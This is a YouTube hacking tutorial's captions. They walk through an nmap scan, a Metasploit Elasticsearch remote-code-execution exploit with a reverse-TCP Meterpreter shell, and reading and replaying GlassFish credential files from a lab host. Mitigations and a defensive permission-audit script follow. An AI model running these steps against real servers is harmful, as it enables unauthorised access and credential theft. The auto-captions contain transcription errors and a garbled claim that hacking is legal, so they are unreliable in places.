How Hackers Login To Any Websites Without Password?!

Captions
Hi and welcome back to another episode on how to hack. Today we'll be learning about how you can get access into a system without trying brute force attacks. [Music]

Yes, I know this sounds crazy, but it can absolutely be done. You just really have to understand how those applications store their passwords and credentials, and all you've got to do then is just to replay the password into the login field, and that's it, game over. And remember kids, hacking is legal. If you want to hack, do not try to hack against hacker law, because hacker law can fire IP address, your password and everything about you.

The reason why this can be happening is because, one, there is another vulnerable service within the target server, and the hacker gained access over into the service. After which the hacker then goes over into the listing of the folders, directory, and then finds out that, okay, in this particular other service there is a config folder, and in the config folder they store all these different credentials, like your usernames, your password values, whether they're hashed or plaintext. This allows a hacker to do a replay, and from the replay they can directly gain access back into the original intended service, and from that service this gives them access to the target console of that service or application.

So right in front of us we're on Kali Linux, and this is going to be our hacker's box. We'll be using this to target the machine. The very first thing you can typically do is to enter, for example, nmap. So nmap, we have of course the look at the service version, and we're targeting all the ports, so this may take some time to complete, and then followed by the IP address or the target website or the target domain name. A simple example is I can enter nmap followed by hackerelai.com. So once I enter the domain name, I hit enter, and we'll be scanning against the target domain of hackoly.com, and of course in this case we can see the following of the IP address as well as the ports that are open from this specific domain name. So in three, two, one, let's go ahead and hit enter on that and begin the scanning process to look at all these open services of the target IP address. Once you're ready, we'll be able to look at all these different services and see which one of them has a login page, and after which we can target it.

So you can see right here we got the scan completed, so this is awesome, and we can see of course several examples of HTTP servers. We can see MySQL, we have SSL HTTP and all these different HTTP accesses that we can enter into a browser, and then after which target IP address and domain name, and we'll be able to open it up and see what we got there. Of course in this case we'll be targeting 4848, which is an Oracle GlassFish, right? So let's go ahead and open up a browser and go in right there. We can open up, say for example, Firefox ESR, and then we can target the IP address. In this case of course we have the 192.168.0.113 followed by the 4848 port number. Hit enter on that, and you can see right here we're on the GlassFish Server Open Source Edition, and here we've got the username as well as the password field. But first, we do not know what exactly is the username and password, so we have to pivot from other services that may be vulnerable so that we can find out the username and password and gain access into the site.

Good news is that there are multiple services that are open, so that we can try to gain access to them, and one of them is port 9200. So what we can do now is go back over into the target IP address. In this case we could be using a browser, and we can enter in the browser, all right, the IP address and then followed by 9200. Hit enter on that, and we can see the following. Okay, we have the version number, we have the tagline, so this is using an Elasticsearch service.

Next up, what we can do is jump over into another terminal and enter sudo msfconsole. I want to search for an exploit that we can use to target another service. Okay, so the idea is to gain access into the server, and then after which be able to enumerate some of the other files that could be stored in a GlassFish folder or directory. So what we can do now is enter search for elastic, enter on that, and we can see the following: we have the exploit/multi/elasticsearch/script_mvel_rce. So what we can do now is go ahead and enter use 0, and the good thing is of course we're defaulting to java/meterpreter/reverse_tcp. Enter show options on this, and what we can see right here is that we can enter the RHOSTS. So go ahead and enter set RHOSTS of the IP address 192.168.0.113, hit enter on that, and that's it, done. We are ready. Go ahead and exploit on it, go ahead and enter run, and we can see the following right here: remote OS is Windows Server, we have sending of the stage on the Windows 10 directory or file folder.

Here, what we can do now is, once we are in, we'll be able to do an enumeration. So you can see right here, Meterpreter session one open. What we can do next is go ahead and enter shell, and once we're in shell, what we can do is move over into the GlassFish directory. Once we're here, enter dir, okay, and we can see over here once again, all right, so looking out for interesting files that we can gain access into. So cd into config. Config is the place where you're storing a lot of all these different configuration details, and this is going to be a key place for us to gain access into the site. Here we can enter type local-password, okay, hit enter on that, and we got the following right here. This is something that we can reuse as part of logging in to the site, so I can do a copy of selection. What we can do next is another type to target another file over here, which is the admin-keyfile. So go ahead and enter type admin-keyfile, hit enter on that, and we got the following. So we got admin and we got SHA256, all right, we got all these different details.

Go back over to the login screen of GlassFish, enter the username of admin, and go ahead and paste the following values that we have just copied over. So do a right click, inspect element, and then of course I can change it up over here. I can change, say for example, the type of password, I hit enter and I remove this, and we can see that we're copying and pasting it right here. Click login. In three, two, one, click login, and we'll be seeing something really interesting in a moment. All right, logging in to the GlassFish console, right here we are in. We have access over into the service right now.

So in order to defend against this type of attack, one is that you need to scan your service regularly, looking out for all these different vulnerabilities, and then be able to protect them, say using some form of web application firewall, so that you can prevent unauthorized accesses to different parts of those critical paths. Number two is that you need to constantly update all these different services that are residing within your server, so you have to update the services like GlassFish as well as your Elasticsearch and all these different services that you use to host and provide services to all the different applications or systems. Number three, you need to be able to set the right permissions, so that even when a specific service has been compromised, they are not able to browse over into other folders or directories, being able to view all of those configuration files.

So once again, I hope you learned something valuable in today's tutorial. Like, share, subscribe and turn on notifications so that you do not get hacked.
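
The third mitigation in the captions (credential files should not be readable from another compromised service), as an added example that is not from the video: a Python audit for a POSIX host that flags GlassFish credential files readable or writable by accounts other than the owning service. The file names `local-password` and `admin-keyfile` come from the captions; `audit_config_dir`, the directory layout and the sample files are constructed for illustration.

```python
import os
import stat
import tempfile

# File names the captions show being read from the GlassFish config directory.
SENSITIVE_NAMES = {"local-password", "admin-keyfile"}


def audit_config_dir(config_dir, service_uid):
    """Return (path, reason) findings for credential files that accounts
    other than the owning service account could read or modify."""
    findings = []
    for root, _dirs, files in os.walk(config_dir):
        for name in files:
            if name not in SENSITIVE_NAMES:
                continue
            path = os.path.join(root, name)
            st = os.lstat(path)  # lstat: do not follow a planted symlink
            if stat.S_ISLNK(st.st_mode):
                findings.append((path, "is a symlink"))
                continue
            if st.st_uid != service_uid:
                findings.append((path, f"owned by uid {st.st_uid}, expected {service_uid}"))
            if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((path, "readable by group or others"))
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, "writable by group or others"))
    return findings


def demo():
    """Build a constructed config tree (assumed layout) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        cfg = os.path.join(tmp, "domain1", "config")  # constructed path
        os.makedirs(cfg)
        for name, mode in (("local-password", 0o644), ("admin-keyfile", 0o600)):
            path = os.path.join(cfg, name)
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
            os.chmod(path, mode)  # set explicitly so umask does not matter
        found = audit_config_dir(cfg, os.getuid())
        return [(os.path.basename(p), reason) for p, reason in found]


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

The host in the video runs Windows, where the same check is made against file ACLs rather than mode bits; either way the check only helps if each service runs under its own account.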
Info
Channel: Loi Liang Yang
Views: 469,048
Keywords: hacker, hacking, cracker, cracking, kali linux, kali, metasploit, ethical hacking, ethical hacker, penetration testing, penetration tester, owasp
Id: OTY_z5tzCRU
Length: 6min 49sec (409 seconds)
Published: Fri May 06 2022